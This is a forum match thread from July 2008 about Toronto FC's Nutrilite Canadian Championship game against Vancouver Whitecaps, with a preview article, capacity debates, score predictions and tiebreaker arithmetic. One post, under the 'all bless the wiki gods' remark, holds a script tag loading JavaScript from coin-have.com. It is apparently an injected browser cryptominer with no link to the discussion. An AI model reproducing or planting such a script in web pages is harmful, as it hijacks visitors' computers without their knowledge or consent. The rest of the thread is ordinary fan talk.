0 Thread(s)

Default Toronto FC vs Vancouver Whitecaps - MATCH THREAD

VS
    JULY 9, 2008
    Swangaard Stadium
    10:00PM
    TV: GOLTV

Standings:
    Team........................Pts... Pld... W... D... L...
    Montreal Impact..........6 ......3..... 2 ....0... 1
    Toronto FC...................3...... 2..... 1.... 0 ...1
    Vancouver Whitecaps...3...... 3..... 1.... 0... 2

Toronto FC return to action in the Nutrilite Canadian Championship on Wednesday night against Vancouver Whitecaps. Kick off is set for 10:00 p.m. ET. Reds coach John Carver said his players are "fired up for a battle."
    "This game is even more important than the last game against Vancouver," said Carver. "We know what we have to do. To give ourselves a chance to get in the Champions League, we need to get something from the game. I'll not need to say too much to the guys, because they'll definitely be fired up."
    Toronto were beaten 1-0 by Vancouver at BMO Field on Canada Day. Martin Nash scored a first half penalty to win the game and give the Whitecaps their first victory in the tournament. In the United Soccer League, Vancouver are without a win in their last five games.
    Carver was unhappy with the officiating in the match at BMO Field and is calling on the referees to protect his players. "I just hope we get some protection for our quality players," said Carver. "Their game plan when we played home was obvious to everybody. Our flair players were eliminated from the game, and didn't get any protection. I just hope that the officials are strong enough to deal with that and see what is happening."
    "We created chances against Vancouver and just couldn't finish it off. If we keep creating chances they will start to go in. We're going to look to win the game, but we also have to make sure we don't lose the game, to give ourselves a chance going into the game against Montreal," said Carver.
    You can catch the game live on GOL TV (Rogers 428, Bell 404, Star Choice 459, Cogeco 122).
    Toronto FC are three points behind Montreal Impact in the Nutrilite Canadian Championship standings with two games left to play. The Impact have one game remaining, in Toronto on July 22nd. The winners of the Nutrilite Canadian Championship will represent Canada in the CONCACAF Champions League.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Capacity is 4400 people. I just checked on TM and I was able to buy 8 tickets. I don't think they will have much of home field advantage. Beside, I don't see how TFC can lose to them again.

Prediction: 2-0 TFC

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

That's a fair prediction.

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

I think it is about 7,000 seats actually

Remember The Man, The Legend, The Goal 5-12-07 and All That #9 Left On The Pitch, Thanks For The Memories !!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

6,868 to be precise.

As per wiki... it also says this:

"Vancouver Whitecaps of the United Soccer Leagues (USL Div. 1) who list capacity at 5,722 seats"

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

all bless the wiki gods..
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Well I am looking for a TFC victory tonight, they have to take it big time to the Whitecaps and not relent, I think a win is in the cards and that the Reds will just not to go down to this team two games in a row.

Remember The Man, The Legend, The Goal 5-12-07 and All That #9 Left On The Pitch, Thanks For The Memories !!!

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by yellowfellow View Post
    God i hope so.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by yellowfellow View Post
    I'm praying for a blowout! 4-0 TFC so we're ahead on goal differential going into the Impact game, but I would be happy with a 3-0 game so we're at least tied. They better be hungry for the back of the net tonight!

Any idea on what would happen if we're tied in goal diff. and tied after 90 mins after the impact game? I don't see a shoot out in the cards in a round robin?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Lets see what kind of pride and character our boys have. I don't think anybody expects the MLS Cup this season (although its not impossible), but a trip to the CONCACAF Champions League should be a given. Anything but would be a major disappointment IMO.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i know this has been in other posts, but im damn lazy - we're out with a loss? and okay with a draw/win?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Looks like we'll be playing Real Esteli of Nicaragua in the preliminary round if we win the Canadian Championship.

CONCACAF Champions League
    Real Estelí qualify for Champions League as Nicaraguan representative

7/8/2008 - Real Estelí of Nicaragua became the twenty-third and penultimate team to qualify for the inaugural CONCACAF Champions League™.

Real Estelí qualified by way of winning the Nicaraguan Clausura Championship with a 1:0 aggregate result over two legs against Walter Ferreti. Following a goalless first-leg at the Estadio Independencia, Elmer Mejía was the hero for Real Estelí scoring the crucial goal with just five minutes left in extra time of the second-leg.

The win, coupled with their victory in the Apertura Championship, means that Real Estelí qualify for the Champions League as the Nicaraguan representative (NCA1). They will play the winner of the Nutrilite Canadian Championship in the two-leg, home and away Preliminary Round encounter.

The winner of the Nutrilite Canadian Championship will be the final representative in the 2008-2009 CONCACAF Champions League.™

The Preliminary Round of the 2008-09 CONCACAF Champions League™ is composed of 16 teams (BLZ1, CAN1, CFU1, CFU2, CFU3, CRC2, GUA2, HON2, MEX3, MEX4, NCA1, SLV2, PAN1, PAN2, USA3, USA4) drawn into eight home-and-away match-ups that will take place on 26-28 August 2008 and 2-4 September 2008.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

For those of you without the pay channels, don't forget you can still view the game on channelsurfing.net ...link is near the bottom.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by nobodybeatsthewiz View Post
    i know this has been in other posts, but im damn lazy - we're out with a loss? and okay with a draw/win?
    i think we're out with a loss or a draw? pretty sure it's a must win game...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

They better come out flying to make up for their shit display last time.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by dantdot View Post
    They better come out flying to make up for their shit display last time.
    QFT! I'll be happy with a narrow margin of victory, as long as TFC pulls out the win...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

It is not a must win... the first tiebreaker for this tourney is goal differential. Of course if they lost... they would have to beat Montreal by 3 + whatever they lost by tonight. They need to secure at least a point tonight to have confidence going into the last game against MTL that they just need to win (by any amount in that one).

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by nobodybeatsthewiz View Post
    A 1-0 loss means we have to beat montreal by 3 to take it on goals (not sure what the tie breaker after goal dif is)

A tie means we can need a win of any sort against montreal

A 3-0 win means we can still finish on top with a tie against montreal

...I think

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by MartinUtd View Post
    For those of you without the pay channels, don't forget you can still view the game on channelsurfing.net ...link is near the bottom.
    Appreciated!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Smuttynose View Post
    i think we're out with a loss or a draw? pretty sure it's a must win game...
    we're not out with a loss.... the final game still matters no matter what happens tonight.
    If TFC loses 1-0 tonight, they are at 3 points and Montreal is at 6 points with Montreal having a +4 in goal differential. but since TFC plays MTL in the final game, TFC doesn't have to beat MTL 5-0 to win the tourney.
    not sure what the second tiebreaker is, but a 2-0 win against MTL on July 22 would basically even up the competition.

And naturally, even if TFC wins tonight, the final game still matters....

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Rehashing tiebreakers:

There will be three points awarded for a win and one point awarded for a draw. In case two teams are tied on points after four matches, the winner will be decided first by goal differential, then if necessary by most goals scored, then if necessary by most away goals, then if necessary by the drawing of lots.

http://www.canadasoccer.com/eng/medi...?Press_ID=3107

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

All I am sayyyyyingg is we bettttterrrrr win tonight!!!!!!!!!!!!!

Fuck the USL

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

The whole 1-0 loss at BMO was just part of an elaborate rouse by the three teams competing to keep the tournament interesting.

Toronto wins tonight 3-0. Cunningham, Edu and Smith with the goals.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ilikemusic View Post
    The whole 1-0 loss at BMO was just part of an elaborate rouse by the three teams competing to keep the tournament interesting.

Toronto wins tonight 3-0. Cunningham, Edu and Smith with the goals.
    And Cunny will hit the cross bar 2 times and each upright once.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

^^^^

And still run into the stadium seats celebrating. Maybe he will want to sit down and watch the game from there??? Im sure Robert wouldnt mind.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

or you just watch the game at cbc.ca

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Me Need Stream

my life is saved

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

We really need to win this one, no excuses.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

There are three possible outcomes tonight:

1) win by 3 or more - need only a draw against the Impact
    2) draw, win by 1 or win by 2 - must beat Impact, score doesn't matter
    3) lose - must beat Impact, probably by 3 goals or more, to advance

John Carver, if you're up by two in the 80th minute, you need to abandon all caution and go forward for another goal - even if we conceded two late goals in that situation, it wouldn't matter
    “What the world needs is more geniuses with humility; there are so few of us left.”

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I think Robert will get one, he looked great vs Pachuco and was the only player doing anything in the first half of the TFC vs Vancouver in Toronto.

1:0 TFC, Robert goal from a free kick. Cuningham will get subbed for the 16 old kid some time around 70-80 minute